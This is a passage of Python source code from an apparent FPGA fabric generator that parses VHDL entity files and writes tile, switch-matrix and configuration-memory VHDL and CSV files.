# re.sub('\$noun\$', 'the heck', 'What $noun$ is $verb$?')
print(re.sub('entity', 'component', line, flags=re.IGNORECASE), file=file)
marker = True
if re.search('^end ', line, flags=re.IGNORECASE):
marker = False
print('', file=file)
return ConfigPortUsed
def GetComponentPortsFromFile( VHDL_file_name, filter = 'ALL', port = 'internal', BEL_Prefix = '' ):
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
Inputs = []
Outputs = []
ExternalPorts = []
marker = False
FoundEntityMarker = False
DoneMarker = False
direction = ''
for line in VHDLfile:
# the order of the if-statements are important ;
if re.search('^entity', line, flags=re.IGNORECASE):
FoundEntityMarker = True
# detect the direction from comments, like "--NORTH"
# we need this to filter for a specific direction
# this implies of course that this information is provided in the VHDL entity
if re.search('NORTH', line, flags=re.IGNORECASE):
direction = 'NORTH'
if re.search('EAST', line, flags=re.IGNORECASE):
direction = 'EAST'
if re.search('SOUTH', line, flags=re.IGNORECASE):
direction = 'SOUTH'
if re.search('WEST', line, flags=re.IGNORECASE):
direction = 'WEST'
# all primitive pins that are connected to the switch matrix have to go before the GLOBAL label
if re.search('-- global', line, flags=re.IGNORECASE):
FoundEntityMarker = False
marker = False
DoneMarker = True
if (marker == True) and (DoneMarker == False) and (direction == filter or filter == 'ALL') :
# detect if the port has to be exported as EXTERNAL which is flagged by the comment
if re.search('EXTERNAL', line):
External = True
else:
External = False
if re.search('CONFIG_PORT', line):
Config = True
else:
Config = False
# get rid of everything with and after the ';' that will also remove comments
# substitutions = {';.*', '', '--.*', '', ',.*', ''}
# tmp_line=(replace(line, substitutions))
# tmp_line = (re.sub(';.*', '',(re.sub('--.*', '',line, flags=re.IGNORECASE)), flags=re.IGNORECASE))
tmp_line = (re.sub(';.*', '',(re.sub('--.*', '',(re.sub(',.*', '', line, flags=re.IGNORECASE)), flags=re.IGNORECASE)), flags=re.IGNORECASE))
std_vector = ''
if re.search('std_logic_vector', tmp_line, flags=re.IGNORECASE):
std_vector = (re.sub('.*std_logic_vector', '', tmp_line, flags=re.IGNORECASE))
tmp_line = (re.sub('STD_LOGIC.*', '', tmp_line, flags=re.IGNORECASE))
substitutions = {" ": "", "\t": ""}
tmp_line=(replace(tmp_line, substitutions))
# at this point, we get clean port names, like
# A0:in
# A1:in
# A2:in
# The following is for internal fabric signal ports (e.g., a CLB/LUT)
if (port == 'internal') and (External == False) and (Config == False):
if re.search(':in', tmp_line, flags=re.IGNORECASE):
Inputs.append(BEL_Prefix+(re.sub(':in.*', '', tmp_line, flags=re.IGNORECASE))+std_vector)
if re.search(':out', tmp_line, flags=re.IGNORECASE):
Outputs.append(BEL_Prefix+(re.sub(':out.*', '', tmp_line, flags=re.IGNORECASE))+std_vector)
# The following is for ports that have to go all the way up to the top-level entity (e.g., from an I/O cell)
if (port == 'external') and (External == True):
# .lstrip() removes leading white spaces including ' ', '\t'
ExternalPorts.append(BEL_Prefix+line.lstrip())
# frame reconfiguration needs a port for writing in frame data
if (port == 'frame_config') and (Config == True):
# .lstrip() removes leading white spaces including ' ', '\t'
ExternalPorts.append(BEL_Prefix+line.lstrip())
if re.search('port', line, flags=re.IGNORECASE):
marker = True
if port == 'internal': # default
return Inputs, Outputs
else:
return ExternalPorts
def GetNoConfigBitsFromFile( VHDL_file_name ):
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
result='NULL'
for line in VHDLfile:
# the order of the if-statements is important
# if re.search('Generic', line, flags=re.IGNORECASE) and re.search('NoConfigBits', line, flags=re.IGNORECASE):
if re.search('integer', line, flags=re.IGNORECASE) and re.search('NoConfigBits', line, flags=re.IGNORECASE):
result = (re.sub(' ','', (re.sub('\).*', '', (re.sub('.*=', '', line, flags=re.IGNORECASE)), flags=re.IGNORECASE))))
return result
def GetComponentEntityNameFromFile( VHDL_file_name ):
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
for line in VHDLfile:
# the order of the if-statements is important
if re.search('^entity', line, flags=re.IGNORECASE):
result = (re.sub(' ','', (re.sub('entity', '', (re.sub(' is.*', '', line, flags=re.IGNORECASE)), flags=re.IGNORECASE))))
return result
def BootstrapSwitchMatrix( tile_description, TileType, filename ):
Inputs = []
Outputs = []
result = []
# get the >>tile ports<< that connect to the outside world (these are from the NORTH EAST SOUTH WEST entries from the csv file section
# 'N1END0', 'N1END1' ... 'N1BEG0', 'N1BEG1', 'N1BEG2', 'N2BEG0',
# will only be WIRES ports as the rest is eventually used for cascading
Inputs, Outputs = GetTileComponentPorts(tile_description, mode='AutoSwitchMatrix')
# Inputs, Outputs = GetTileComponentPorts(tile_description, mode='SwitchMatrix')
# get all >>BEL ports<<< as defined by the BELs from the VHDL files
for line in tile_description:
if line[0] == 'BEL':
tmp_Inputs = []
tmp_Outputs = []
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
tmp_Inputs, tmp_Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
# print('tmp_Inputs Inputs',tmp_Inputs)
# IMPORTANT: the outputs of a BEL are the inputs to the switch matrix!
Inputs = Inputs + tmp_Outputs
# print('next Inputs',Inputs)
# Outputs.append(tmp_Outputs)
# IMPORTANT: the inputs to a BEL are the outputs of the switch matrix!
Outputs = Outputs + tmp_Inputs
# get all >>JUMP ports<<< (stop over ports that are input and output and that stay in the tile) as defined by the JUMP entries in the CSV file
for line in tile_description:
if line[0] == 'JUMP':
# tmp_Inputs = []
# tmp_Outputs = []
for k in range(int(line[wires])):
# the NULL check in the following allows us to have just source ports, such as GND or VCC
if line[destination_name] != 'NULL':
Inputs.append(str(line[destination_name])+str(k))
if line[source_name] != 'NULL':
Outputs.append(str(line[source_name])+str(k))
# generate the matrix
NumberOfInputs=len(Inputs)
NumberOfOutputs=len(Outputs)
# initialize with 0
for output in range(NumberOfOutputs+1):
one_line = []
for input in range(NumberOfInputs+1):
# one_line.append(str(output)+'_'+str(input))
one_line.append(str(0))
result.append(one_line)
# annotate input and output names
result[0][0] = TileType
for k in range(0,NumberOfOutputs):
result[k+1][0] = Outputs[k]
for k in range(0,NumberOfInputs):
result[0][k+1] = Inputs[k]
# result CLB, N1END0, N1END1, N1END2, ...
# result N1BEG0, 0, 0, 0, ...
# result N1BEG1, 0, 0, 0, ...
# I found something that writes the csv file
# import numpy
# tmp = array.zeros((NumberOfInputs+1,NumberOfOutputs+1)) #np.zeros(20).reshape(NumberOfInputs,NumberOfOutputs)
# array = np.array([(1,2,3), (4,5,6)])
tmp = numpy.asarray(result)
if filename != '':
numpy.savetxt(filename, tmp, fmt='%s', delimiter=",")
return Inputs, Outputs
def PrintTileComponentPort (tile_description, entity, direction, file ):
print('\t-- ',direction, file=file)
for line in tile_description:
if line[0] == direction:
if line[source_name] != 'NULL':
print('\t\t',line[source_name], '\t: out \tSTD_LOGIC_VECTOR( ', end='', file=file)
print(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1, end='', file=file)
print(' downto 0 );', end='', file=file)
print('\t -- wires:'+line[wires], end=' ', file=file)
print('X_offset:'+line[X_offset], 'Y_offset:'+line[Y_offset], ' ', end='', file=file)
print('source_name:'+line[source_name], 'destination_name:'+line[destination_name], ' \n', end='', file=file)
for line in tile_description:
if line[0] == direction:
if line[destination_name] != 'NULL':
print('\t\t',line[destination_name], '\t: in \tSTD_LOGIC_VECTOR( ', end='', file=file)
print(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1, end='', file=file)
print(' downto 0 );', end='', file=file)
print('\t -- wires:'+line[wires], end=' ', file=file)
print('X_offset:'+line[X_offset], 'Y_offset:'+line[Y_offset], ' ', end='', file=file)
print('source_name:'+line[source_name], 'destination_name:'+line[destination_name], ' \n', end='', file=file)
return
def GetTileComponentPorts( tile_description, mode='SwitchMatrix'):
Inputs = []
Outputs = []
OpenIndex = ''
CloseIndex = ''
if re.search('Indexed', mode, flags=re.IGNORECASE):
OpenIndex = '('
CloseIndex = ')'
for line in tile_description:
if (line[direction] == 'NORTH') or (line[direction] == 'EAST') or (line[direction] == 'SOUTH') or (line[direction] == 'WEST'):
# range (wires-1 downto 0) as connected to the switch matrix
if mode in ['SwitchMatrix','SwitchMatrixIndexed']:
ThisRange = int(line[wires])
if mode in ['AutoSwitchMatrix','AutoSwitchMatrixIndexed']:
if line[source_name] == 'NULL' or line[destination_name] == 'NULL':
# the following line connects all wires to the switch matrix in the case one port is NULL (typically termination)
ThisRange = (abs(int(line[X_offset]))+abs(int(line[Y_offset]))) * int(line[wires])
else:
# the following line connects all bottom wires to the switch matrix in the case begin and end ports are used
ThisRange = int(line[wires])
# range ((wires*distance)-1 downto 0) as connected to the tile top
if mode in ['all','allIndexed','Top','TopIndexed','AutoTop','AutoTopIndexed']:
ThisRange = (abs(int(line[X_offset]))+abs(int(line[Y_offset]))) * int(line[wires])
# the following three lines are needed to get the top line[wires] that are actually the connection from a switch matrix to the routing fabric
StartIndex = 0
if mode in ['Top','TopIndexed']:
StartIndex = ((abs(int(line[X_offset]))+abs(int(line[Y_offset])))-1) * int(line[wires])
if mode in ['AutoTop','AutoTopIndexed']:
if line[source_name] == 'NULL' or line[destination_name] == 'NULL':
# in case one port is NULL, then the all the other port wires get connected to the switch matrix.
StartIndex = 0
else:
# "normal" case as for the CLBs
StartIndex = ((abs(int(line[X_offset]))+abs(int(line[Y_offset])))-1) * int(line[wires])
for i in range(StartIndex, ThisRange):
if line[destination_name] != 'NULL':
Inputs.append(line[destination_name]+OpenIndex+str(i)+CloseIndex)
if line[source_name] != 'NULL':
Outputs.append(line[source_name]+OpenIndex+str(i)+CloseIndex)
return Inputs, Outputs
def GetTileComponentPortsVectors( tile_description, mode ):
Inputs = []
Outputs = []
MaxIndex = 0
for line in tile_description:
if (line[direction] == 'NORTH') or (line[direction] == 'EAST') or (line[direction] == 'SOUTH') or (line[direction] == 'WEST'):
# range (wires-1 downto 0) as connected to the switch matrix
if mode in ['SwitchMatrix','SwitchMatrixIndexed']:
MaxIndex = int(line[wires])
# range ((wires*distance)-1 downto 0) as connected to the tile top
if mode in ['all','allIndexed']:
MaxIndex = (abs(int(line[X_offset]))+abs(int(line[Y_offset]))) * int(line[wires])
if line[destination_name] != 'NULL':
Inputs.append(str(line[destination_name]+'('+str(MaxIndex)+' downto 0)'))
if line[source_name] != 'NULL':
Outputs.append(str(line[source_name]+'('+str(MaxIndex)+' downto 0)'))
return Inputs, Outputs
def GenerateVHDL_Header( file, entity, package='' , NoConfigBits='0', MaxFramesPerCol='NULL', FrameBitsPerRow='NULL'):
# library template
print('library IEEE;', file=file)
print('use IEEE.STD_LOGIC_1164.ALL;', file=file)
print('use IEEE.NUMERIC_STD.ALL;', file=file)
if package != '':
print(package, file=file)
print('', file=file)
# entity
print('entity ',entity,' is ', file=file)
print('\tGeneric ( ', file=file)
if MaxFramesPerCol != 'NULL':
print('\t\t\t MaxFramesPerCol : integer := '+MaxFramesPerCol+';', file=file)
if FrameBitsPerRow != 'NULL':
print('\t\t\t FrameBitsPerRow : integer := '+FrameBitsPerRow+';', file=file)
print('\t\t\t NoConfigBits : integer := '+NoConfigBits+' );', file=file)
print('\tPort (', file=file)
return
def GenerateVHDL_EntityFooter ( file, entity, ConfigPort=True , NumberOfConfigBits = ''):
if ConfigPort==False:
# stupid VHDL doesn't allow us to finish the last port signal declaration with a ';',
# so we pragmatically delete that if we have no config port
# TODO - move this into a function, but only if we have a regression suite in place
# TODO - move this into a function, but only if we have a regression suite in place
# TODO - move this into a function, but only if we have a regression suite in place
file.seek(0) # seek to beginning of the file
last_pos = 0 # we use this variable to find the position of last ';'
while True:
my_char = file.read(1)
if not my_char:
break
else:
if my_char == ';': # scan character by character and look for ';'
last_pos = file.tell()
file.seek(last_pos-1) # place seek pointer to last ';' position and overwrite with a space
print(' ', end='', file=file)
file.seek(0, os.SEEK_END) # go back to usual...
# file.seek(interupt_pos)
# file.seek(0, os.SEEK_END) # seek to end of file; f.seek(0, 2) is legal
# file.seek(file.tell() - 3, os.SEEK_SET) # go backwards 3 bytes
# file.truncate()
print('', file=file)
print('\t-- global', file=file)
if ConfigPort==True:
if ConfigBitMode == 'FlipFlopChain':
print('\t\t MODE\t: in \t STD_LOGIC;\t -- global signal 1: configuration, 0: operation', file=file)
print('\t\t CONFin\t: in \t STD_LOGIC;', file=file)
print('\t\t CONFout\t: out \t STD_LOGIC;', file=file)
print('\t\t CLK\t: in \t STD_LOGIC', file=file)
if ConfigBitMode == 'frame_based':
print('\t\t ConfigBits : in \t STD_LOGIC_VECTOR( NoConfigBits -1 downto 0 )', file=file)
print('\t);', file=file)
print('end entity',entity,';', file=file)
print('', file=file)
# architecture
print('architecture Behavioral of ',entity,' is ', file=file)
print('', file=file)
return
def GenerateVHDL_Conf_Instantiation ( file, counter, close=True ):
print('\t -- GLOBAL all primitive pins for configuration (not further parsed) ', file=file)
print('\t\t MODE => Mode, ', file=file)
print('\t\t CONFin => conf_data('+str(counter)+'), ', file=file)
print('\t\t CONFout => conf_data('+str(counter+1)+'), ', file=file)
if close==True:
print('\t\t CLK => CLK ); \n', file=file)
else:
print('\t\t CLK => CLK ', file=file)
return
def GenerateTileVHDL( tile_description, entity, file ):
MatrixInputs = []
MatrixOutputs = []
TileInputs = []
TileOutputs = []
BEL_Inputs = []
BEL_Outputs = []
AllJumpWireList = []
NuberOfSwitchMatricesWithConfigPort = 0
# We first check if we need a configuration port
# Currently we assume that each primitive needs a configuration port
# However, a switch matrix can have no switch matrix multiplexers
# (e.g., when only bouncing back in border termination tiles)
# we can detect this as each switch matrix file contains a comment -- NumberOfConfigBits
# NumberOfConfigBits:0 tells us that the switch matrix does not have a config port
# TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
# TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
# TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
# TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
TileTypeMarker = False
for line in tile_description:
if line[0] == 'TILE':
TileType = line[TileType_position]
TileTypeMarker = True
if TileTypeMarker == False:
raise ValueError('Could not find tile type in function GenerateTileVHDL')
# the VHDL initial header generation is shared until the Port
# in order to use GenerateVHDL_Header, we have to count the number of configuration bits by scanning all files for the "Generic ( NoConfigBits...
GlobalConfigBitsCounter = 0
if ConfigBitMode == 'frame_based':
for line in tile_description:
if (line[0] == 'BEL') or (line[0] == 'MATRIX'):
if (GetNoConfigBitsFromFile(line[VHDL_file_position])) != 'NULL':
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(GetNoConfigBitsFromFile(line[VHDL_file_position]))
# GenerateVHDL_Header(file, entity, NoConfigBits=str(GlobalConfigBitsCounter))
GenerateVHDL_Header(file, entity, package=Package, NoConfigBits=str(GlobalConfigBitsCounter), MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow))
PrintTileComponentPort (tile_description, entity, 'NORTH', file)
PrintTileComponentPort (tile_description, entity, 'EAST', file)
PrintTileComponentPort (tile_description, entity, 'SOUTH', file)
PrintTileComponentPort (tile_description, entity, 'WEST', file)
# now we have to scan all BELs if they use external pins, because they have to be exported to the tile entity
ExternalPorts = []
for line in tile_description:
if line[0] == 'BEL':
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
ExternalPorts = ExternalPorts + (GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix = BEL_prefix_string+'BEL_prefix_string_marker'))
# if we found BELs with top-level IO ports, we just pass them through
SharedExternalPorts = []
if ExternalPorts != []:
print('\t-- Tile IO ports from BELs', file=file)
for item in ExternalPorts:
# if a part is flagged with the 'SHARED_PORT' comment, we declare that port only ones
# we use the string 'BEL_prefix_string_marker' to separate the port name from the prefix
if re.search('SHARED_PORT', item):
# we firstly get the plain port name without comments, whitespaces, etc.
# we place that in the SharedExternalPorts list to check if that port was declared earlier
shared_port = re.sub(':.*', '',re.sub('.*BEL_prefix_string_marker', '', item)).strip()
if shared_port not in SharedExternalPorts:
print('\t\t',re.sub('.*BEL_prefix_string_marker', '', item), file=file)
SharedExternalPorts.append(shared_port)
else:
print('\t\t',re.sub('BEL_prefix_string_marker', '', item), file=file)
# the rest is a shared text block
if ConfigBitMode == 'frame_based':
if GlobalConfigBitsCounter > 0:
print('\t\t FrameData: in STD_LOGIC_VECTOR( FrameBitsPerRow -1 downto 0 ); -- CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\t\t FrameStrobe: in STD_LOGIC_VECTOR( MaxFramesPerCol -1 downto 0 ); -- CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register ', file=file)
GenerateVHDL_EntityFooter(file, entity, ConfigPort=False)
else:
GenerateVHDL_EntityFooter(file, entity)
# insert CLB, I/O (or whatever BEL) component declaration
# specified in the fabric csv file after the 'BEL' key word
BEL_VHDL_riles_processed = [] # we use this list to check if we have seen a BEL description before so we only insert one component declaration
for line in tile_description:
if line[0] == 'BEL':
Inputs = []
Outputs = []
if line[VHDL_file_position] not in BEL_VHDL_riles_processed:
PrintComponentDeclarationForFile(line[VHDL_file_position], file)
BEL_VHDL_riles_processed.append(line[VHDL_file_position])
# we need the BEL ports (a little later) so we take them on the way
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
Inputs, Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
BEL_Inputs = BEL_Inputs + Inputs
BEL_Outputs = BEL_Outputs + Outputs
print('', file=file)
# insert switch matrix component declaration
# specified in the fabric csv file after the 'MATRIX' key word
MatrixMarker = False
for line in tile_description:
if line[0] == 'MATRIX':
if MatrixMarker == True:
raise ValueError('More than one switch matrix defined for tile '+TileType+'; exeting GenerateTileVHDL')
NuberOfSwitchMatricesWithConfigPort = NuberOfSwitchMatricesWithConfigPort + PrintComponentDeclarationForFile(line[VHDL_file_position], file)
# we need the switch matrix ports (a little later)
MatrixInputs, MatrixOutputs = GetComponentPortsFromFile(line[VHDL_file_position])
MatrixMarker = True
print('', file=file)
if MatrixMarker == False:
raise ValueError('Could not find switch matrix definition for tyle type '+TileType+' in function GenerateTileVHDL')
if ConfigBitMode == 'frame_based' and GlobalConfigBitsCounter > 0:
PrintComponentDeclarationForFile(entity+'_ConfigMem.vhdl', file)
# VHDL signal declarations
print('-- signal declarations'+'\n', file=file)
# BEL port wires
print('-- BEL ports (e.g., slices)', file=file)
for port in (BEL_Inputs + BEL_Outputs):
print('signal\t'+port+'\t:STD_LOGIC;', file=file)
# Jump wires
print('-- jump wires', file=file)
for line in tile_description:
if line[0] == 'JUMP':
if (line[source_name] == '') or (line[destination_name] == ''):
raise ValueError('Either source or destination port for JUMP wire missing in function GenerateTileVHDL')
# we don't add ports or a corresponding signal name, if we have a NULL driver (which we use as an exception for GND and VCC (VCC0 GND0)
if not re.search('NULL', line[source_name], flags=re.IGNORECASE):
print('signal\t',line[source_name], '\t:\tSTD_LOGIC_VECTOR('+str(line[wires])+' downto 0);', file=file)
# we need the jump wires for the switch matrix component instantiation..
for k in range(int(line[wires])):
AllJumpWireList.append(str(line[source_name]+'('+str(k)+')'))
# internal configuration data signal to daisy-chain all BELs (if any and in the order they are listed in the fabric.csv)
print('-- internal configuration data signal to daisy-chain all BELs (if any and in the order they are listed in the fabric.csv)', file=file)
# the signal has to be number of BELs+2 bits wide (Bel_counter+1 downto 0)
BEL_counter = 0
for line in tile_description:
if line[0] == 'BEL':
BEL_counter += 1
# we chain switch matrices only to the configuration port, if they really contain configuration bits
# i.e. switch matrices have a config port which is indicated by "NumberOfConfigBits:0 is false"
# The following conditional as intended to only generate the config_data signal if really anything is actually configured
# however, we leave it and just use this signal as conf_data(0 downto 0) for simply touting through CONFin to CONFout
# maybe even useful if we want to add a buffer here
# if (Bel_Counter + NuberOfSwitchMatricesWithConfigPort) > 0
print('signal\t'+'conf_data'+'\t:\t STD_LOGIC_VECTOR('+str(BEL_counter+NuberOfSwitchMatricesWithConfigPort)+' downto 0);', file=file)
if GlobalConfigBitsCounter > 0:
print('signal \t ConfigBits :\t STD_LOGIC_VECTOR (NoConfigBits -1 downto 0);', file=file)
# architecture body
print('\n'+'begin'+'\n', file=file)
# Cascading of routing for wires spanning more than one tile
print('-- Cascading of routing for wires spanning more than one tile', file=file)
for line in tile_description:
if line[0] in ['NORTH','EAST','SOUTH','WEST']:
span=abs(int(line[X_offset]))+abs(int(line[Y_offset]))
# in case a signal spans 2 ore more tiles in any direction
if (span >= 2) and (line[source_name]!='NULL') and (line[destination_name]!='NULL'):
print(line[source_name]+'('+line[source_name]+'\'high - '+str(line[wires])+' downto 0)',end='', file=file)
print(' <= '+line[destination_name]+'('+line[destination_name]+'\'high downto '+str(line[wires])+');', file=file)
# top configuration data daisy chaining
if ConfigBitMode == 'FlipFlopChain':
print('-- top configuration data daisy chaining', file=file)
print('conf_data(conf_data\'low) <= CONFin; -- conf_data\'low=0 and CONFin is from tile entity', file=file)
print('CONFout <= conf_data(conf_data\'high); -- CONFout is from tile entity', file=file)
# the <entity>_ConfigMem module is only parametrized through generics, so we hard code its instantiation here
if ConfigBitMode == 'frame_based' and GlobalConfigBitsCounter > 0:
print('\n-- configuration storage latches', file=file)
print('Inst_'+entity+'_ConfigMem : '+entity+'_ConfigMem', file=file)
print('\tPort Map( ' , file=file)
print('\t\t FrameData \t =>\t FrameData, ' , file=file)
print('\t\t FrameStrobe \t =>\t FrameStrobe, ' , file=file)
print('\t\t ConfigBits \t =>\t ConfigBits );' , file=file)
# BEL component instantiations
print('\n-- BEL component instantiations\n', file=file)
All_BEL_Inputs = [] # the right hand signal name which gets a BEL prefix
All_BEL_Outputs = [] # the right hand signal name which gets a BEL prefix
left_All_BEL_Inputs = [] # the left hand port name which does not get a BEL prefix
left_All_BEL_Outputs = [] # the left hand port name which does not get a BEL prefix
BEL_counter = 0
BEL_ConfigBitsCounter = 0
for line in tile_description:
if line[0] == 'BEL':
BEL_Inputs = [] # the right hand signal name which gets a BEL prefix
BEL_Outputs = [] # the right hand signal name which gets a BEL prefix
left_BEL_Inputs = [] # the left hand port name which does not get a BEL prefix
left_BEL_Outputs = [] # the left hand port name which does not get a BEL prefix
ExternalPorts = []
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
# the BEL I/Os that go to the switch matrix
BEL_Inputs, BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
left_BEL_Inputs, left_BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position])
# the BEL I/Os that go to the tile top entity
# ExternalPorts = GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix=BEL_prefix_string)
ExternalPorts = GetComponentPortsFromFile(line[VHDL_file_position], port='external')
# we remember All_BEL_Inputs and All_BEL_Outputs as wee need these pins for the switch matrix
All_BEL_Inputs = All_BEL_Inputs + BEL_Inputs
All_BEL_Outputs = All_BEL_Outputs + BEL_Outputs
left_All_BEL_Inputs = left_All_BEL_Inputs + left_BEL_Inputs
left_All_BEL_Outputs = left_All_BEL_Outputs + left_BEL_Outputs
EntityName = GetComponentEntityNameFromFile(line[VHDL_file_position])
print('Inst_'+BEL_prefix_string+EntityName+' : '+EntityName, file=file)
print('\tPort Map(', file=file)
for k in range(len(BEL_Inputs+BEL_Outputs)):
print('\t\t',(left_BEL_Inputs+left_BEL_Outputs)[k],' => ',(BEL_Inputs+BEL_Outputs)[k],',', file=file)
# top level I/Os (if any) just get connected directly
if ExternalPorts != []:
print('\t -- I/O primitive pins go to tile top level entity (not further parsed) ', file=file)
for item in ExternalPorts:
# print('DEBUG ExternalPort :',item)
port = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
port=(replace(port, substitutions))
if re.search('SHARED_PORT', item):
print('\t\t',port,' => '+port,',', file=file)
else: # if not SHARED_PORT then add BEL_prefix_string to signal name
print('\t\t',port,' => '+BEL_prefix_string+port,',', file=file)
# global configuration port
if ConfigBitMode == 'FlipFlopChain':
GenerateVHDL_Conf_Instantiation(file=file, counter=BEL_counter, close=True)
if ConfigBitMode == 'frame_based':
BEL_ConfigBits = GetNoConfigBitsFromFile(line[VHDL_file_position])
if BEL_ConfigBits != 'NULL':
if int(BEL_ConfigBits) == 0:
#print('\t\t ConfigBits => (others => \'-\') );\n', file=file)
print('\t\t );\n', file=file)
else:
print('\t\t ConfigBits => ConfigBits ( '+str(BEL_ConfigBitsCounter + int(BEL_ConfigBits))+' -1 downto '+str(BEL_ConfigBitsCounter)+' ) );\n', file=file)
BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
# for the next BEL (if any) for cascading configuration chain (this information is also needed for chaining the switch matrix)
BEL_counter += 1
# switch matrix component instantiation
# important to know:
# Each switch matrix entity is build up is a specific order:
# 1.a) interconnect wire INPUTS (in the order defined by the fabric file,)
# 2.a) BEL primitive INPUTS (in the order the BEL-VHDLs are listed in the fabric CSV)
# within each BEL, the order from the entity is maintained
# Note that INPUTS refers to the view of the switch matrix! Which corresponds to BEL outputs at the actual BEL
# 3.a) JUMP wire INPUTS (in the order defined by the fabric file)
# 1.b) interconnect wire OUTPUTS
# 2.b) BEL primitive OUTPUTS
# Again: OUTPUTS refers to the view of the switch matrix which corresponds to BEL inputs at the actual BEL
# 3.b) JUMP wire OUTPUTS
# The switch matrix uses single bit ports (std_logic and not std_logic_vector)!!!
print('\n-- switch matrix component instantiation\n', file=file)
for line in tile_description:
if line[0] == 'MATRIX':
BEL_Inputs = []
BEL_Outputs = []
BEL_Inputs, BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position])
EntityName = GetComponentEntityNameFromFile(line[VHDL_file_position])
print('Inst_'+EntityName+' : '+EntityName, file=file)
print('\tPort Map(', file=file)
# for port in BEL_Inputs + BEL_Outputs:
# print('\t\t',port,' => ',port,',', file=file)
Inputs = []
Outputs = []
TopInputs = []
TopOutputs = []
# Inputs, Outputs = GetTileComponentPorts(tile_description, mode='SwitchMatrixIndexed')
# changed to: AutoSwitchMatrixIndexed
Inputs, Outputs = GetTileComponentPorts(tile_description, mode='AutoSwitchMatrixIndexed')
# TopInputs, TopOutputs = GetTileComponentPorts(tile_description, mode='TopIndexed')
# changed to: AutoTopIndexed
TopInputs, TopOutputs = GetTileComponentPorts(tile_description, mode='AutoTopIndexed')
for k in range(len(BEL_Inputs+BEL_Outputs)):
print('\t\t',(BEL_Inputs+BEL_Outputs)[k],' => ',end='', file=file)
# note that the BEL outputs (e.g., from the slice component) are the switch matrix inputs
print((Inputs+All_BEL_Outputs+AllJumpWireList+TopOutputs+All_BEL_Inputs+AllJumpWireList)[k], end='', file=file)
if NuberOfSwitchMatricesWithConfigPort > 0:
print(',', file=file)
else:
# stupid VHDL does not allow us to have a ',' for the last port connection, so we need the following for NuberOfSwitchMatricesWithConfigPort==0
if k < ((len(BEL_Inputs+BEL_Outputs)) - 1):
print(',', file=file)
if NuberOfSwitchMatricesWithConfigPort > 0:
if ConfigBitMode == 'FlipFlopChain':
GenerateVHDL_Conf_Instantiation(file=file, counter=BEL_counter, close=False)
# print('\t -- GLOBAL all primitive pins for configuration (not further parsed) ', file=file)
# print('\t\t MODE => Mode, ', file=file)
# print('\t\t CONFin => conf_data('+str(BEL_counter)+'), ', file=file)
# print('\t\t CONFout => conf_data('+str(BEL_counter+1)+'), ', file=file)
# print('\t\t CLK => CLK ', file=file)
if ConfigBitMode == 'frame_based':
BEL_ConfigBits = GetNoConfigBitsFromFile(line[VHDL_file_position])
if BEL_ConfigBits != 'NULL':
# print('DEBUG:',BEL_ConfigBits)
print('\t\t ConfigBits => ConfigBits ( '+str(BEL_ConfigBitsCounter + int(BEL_ConfigBits))+' -1 downto '+str(BEL_ConfigBitsCounter)+' ) ', file=file)
BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
print('\t\t ); ', file=file)
print('\n'+'end Behavioral;'+'\n', file=file)
return
def GenerateConfigMemInit( tile_description, entity, file, GlobalConfigBitsCounter ):
# write configuration bits to frame mapping init file (e.g. 'LUT4AB_ConfigMem.init.csv')
# this file can be modified and saved as 'LUT4AB_ConfigMem.csv' (without the '.init')
BitsLeftToPackInFrames = GlobalConfigBitsCounter
initCSV = []
one_line = []
one_line.append('#frame_name')
one_line.append('frame_index')
one_line.append('bits_used_in_frame')
one_line.append('used_bits_mask')
one_line.append('ConfigBits_ranges')
initCSV.append(one_line)
for k in range(int(MaxFramesPerCol)):
one_line = []
# frame0, frame1, ...
one_line.append('frame'+str(k))
# and the index (0, 1, 2, ...), in case we need
one_line.append(str(k))
# size of the frame in bits
if BitsLeftToPackInFrames >= FrameBitsPerRow:
one_line.append(str(FrameBitsPerRow))
# generate a string encoding a '1' for each flop used
FrameBitsMask = ('1' * FrameBitsPerRow)
tmp_one_line = ''
for k in range(len(FrameBitsMask)):
tmp_one_line = tmp_one_line + FrameBitsMask[k]
if ((k%4)==3) and (k != (len(FrameBitsMask)-1)): # after every 4th character add a '_'
tmp_one_line = tmp_one_line + '_' # some "pretty" printing, results in '1111_1111_1...'
one_line.append(tmp_one_line)
one_line.append(str(BitsLeftToPackInFrames-1)+':'+str(BitsLeftToPackInFrames-FrameBitsPerRow))
BitsLeftToPackInFrames = BitsLeftToPackInFrames - FrameBitsPerRow
